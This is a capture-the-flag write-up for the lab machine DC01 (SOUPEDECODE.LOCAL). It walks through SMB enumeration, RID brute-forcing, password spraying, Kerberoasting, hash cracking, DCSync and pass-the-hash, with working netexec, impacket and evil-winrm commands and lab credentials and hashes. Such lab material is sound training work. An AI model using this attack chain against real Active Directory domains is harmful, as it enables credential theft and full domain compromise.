DC01
Configuration:
We firstly click on Download button to download it:
Unzip it after downloading it:
Lets open it in virtualbox:
Then to configure the network we will go to network:
And create a new one in NAT:
Now we have to change the network interface for that DC machine and our kali machine so they can be reach to each other:
And we will start both of them:
When we see this pane in DC01, we leave it and go to our kali machine to start hacking:
Enumeration:
Get our IP to perform SMB sweep to see what other IP is open:
ifconfig
netexec smb 10.0.2.0/24
Here is the IP of the target machine.
Before anything, lets add this IP to the hosts file:
sudo vim /etc/hosts
10.0.2.28 SOUPEDECODE.LOCAL DC01.SOUPEDECODE.LOCAL
:wq
ping soupedecode.local
Lets start nmap scan to scan all open ports on that target system:
sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.localnmap: Network Mapper to scan IPs, and ports.-sC: Use default nmap scripts.-sV: Service version enumeration.--min-rate 4000: Speed up the scan.-oN nmap/allports: Output the result in normal format.-vv: Increase verbosity.
It is active directory machine.
Starting with smb (445):
Check if anonymous login is allowed:
netexec smb soupedecode.local -u '' -p ''smb: Protocol we want to use.-u: Specify the username to authenticate with.-p: Users' password.
Access denied.
Lets try with guest account:
netexec smb soupedecode.local -u 'guest' -p ''
We have access as the guest user.
Now lets see if we have shares that we have read/write access to:
netexec smb soupedecode.local -u 'guest' -p '' --shares
We have read access to the IPC$ share which is default and not interesting.
Ok lets dump the users, since we have access to IPC:
netexec smb soupedecode.local -u 'guest' -p '' --users
It seems we can not, lets try --rid-brute:
netexec smb soupedecode.local -u 'guest' -p '' --rid-brute--rid-brute: Perform RID (Relative Identifier) brute-forcing. (e.g. 500: administrator, 1103:bmark0, etc.).
We dumped the users:
Redirect the result to an output to get only the users.
cat temp.txt | grep 'SidTypeUser' | awk '{print $6}' | cut -d '\' -f 2 > users.txt
At this moment, we can perform several attacks like password spraying if we have a password, or AS-REP Roasting to get TGTs.
Exploitation:
Lets try password spray and the password is the same as the username:
netexec smb soupedecode.local -u users.txt -p users.txt --no-bruteforce --continue-on-success--no-bruteforce: Just use the password in the same row with the username.--continue-on-success: Do not stop the attack if we got a valid credentials.
We got these credentials.
Lets perform Kerberoasting attack since we have valid credentials:
impacket-GetUserSPNs -dc-ip 10.0.2.28 soupedecode.local/ybob317:'ybob317' -request -outputfile users.hashes
We got clock skew too great, this is because if the system clock of the client and the KDC differ by more than the allowed limit (typically 5 minutes by default), the authentication fails with this error.
So we need to sync our kali system clock with the NPT IP of the target system:
sudo ntpdate 10.0.2.28
Now perform the attack again:
We got those users TGS, now try to crack it:
hashcat users.hashes /usr/share/wordlists/rockyou.txt
It detected the hash types itself.
We have only one hash cracked which is for the user file_svc, and the password is Password123!!.
If we check the shares again with these credentials:
We have read access to the backup share, lets authenticate with smbclient to that share:
smbclient \\\\10.0.2.28\\backup -U 'file_svc%Password123!!'
We only have that txt file which contains ntlm hashes.
Post-Exploitation:
See if any of those are still valid:
We have fileserver machine which is admin.
Lets perform DCSync to dump all domain users hashes:
impacket-secretsdump -just-dc soupedecode.local/'fileserver$'@10.0.2.28 -hashes :e41da7e79a4c76dbd9cf79d1cb325559
This is the domain administrator ntlm hash, we can authenticate via psexec or winrm or wmi:
evil-winrm -i 10.0.2.28 -u administrator -H 88d40c3a9a98889f5cbb778b0db54a2f
Here is the root flag, the user flag is in ybob317 desktop folder.
Last updated